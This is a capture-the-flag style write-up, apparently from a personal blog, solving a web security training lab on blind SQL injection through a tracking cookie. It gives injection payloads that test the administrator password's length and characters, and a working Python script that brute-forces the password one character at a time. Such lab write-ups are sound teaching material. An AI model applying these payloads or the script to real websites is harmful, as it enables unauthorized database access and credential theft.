11 - Blind SQL injection with conditional responses

This lab contains a blind SQL injection vulnerability. The application uses a tracking cookie for analytics, and performs a SQL query containing the value of the submitted cookie.

The results of the SQL query are not returned, and no error messages are displayed. But the application includes a "Welcome back" message in the page if the query returns any rows.

The database contains a different table called users, with columns called username and password. You need to exploit the blind SQL injection vulnerability to find out the password of the administrator user.

To solve the lab, log in as the administrator user.

Given : Injection point(TrackingId), Attack type(Blind), Message(Welcome back!), Table(users), Columns(username,password)
End goal : Login as administrator user

Lets start solving the lab by capturing request in burp. The initial request it gives Welcome back! in response -

As we know there is a blind sqli in TrackingId, after putting ' in TrackingId response comes without Welcome back! message. Which means on a valid query it gives Welcome back! in response

To save our time , first we have to extract the length of the password of administrator user.So lets construct our payload to get the length. Following payload can be used to get the length using length function - ' and LENGTH((SELECT password From users where username='administrator'))=1--
use burp intruder to brute force the length value -

In output we can see a differece in response length when the payload value become 20. Length of the respone changed due to the Welcome back! message -

Now we have to brute force the password. If we start brute forcing the password manually of using intruder , it takes much time. So I created a simple python script to brute force the characters of the passwords.

(make sure to change the Url , cookie values before running)

Code  python
import requests

url = "https://0a940094031fb6c28083f8cc007800e4.web-security-academy.net"

char="abcdefghijklmnopqrstuvwxyz1234567890"
def get_length():
    for i in range(100):
        cookie= {'TrackingId':'LxkaHGwAmYwD24wj','session':'zeGgG4l7DacDnWTOR4LV6En1z9LIPG5Q'}
        payload = f"' and LENGTH((SELECT password From users where username='administrator'))={i}--"
        cookie['TrackingId']+=payload
        res = requests.get(url,cookies=cookie)
        if "Welcome back!" in res.text:
            return i
length = get_length()
print("[+]Length of the password is : ", length)
def get_pass(lengt):
    passwd = ""
    for i in range(1, lengt + 1):
        for c in char:
            cookie = {'TrackingId':'LxkaHGwAmYwD24wj','session':'zeGgG4l7DacDnWTOR4LV6En1z9LIPG5Q'}
            payload=f"' AND SUBSTRING((SELECT password FROM users where username='administrator'),{i},1)='{c}'--"
            cookie['TrackingId']+=payload
            res=requests.get(url,cookies=cookie)
            if "Welcome back!" in res.text:
               passwd+=c
               break
    return passwd
print("[+] Password is : ",get_pass(20))

Output :

Now we have the password of administrator user , go to my accout and login with above credentials to solve the lab.
Lab Solved :

Prev Next

CAPA: The Basics01/02/25 ctf → thm → capa-the-basics

SQLMap: The Basics31/01/25 ctf → thm → sqlmap-the-basics

SQL Fundamentals31/01/25 ctf → thm → sql-fundamentals

Powershell30/01/25 programming → powershell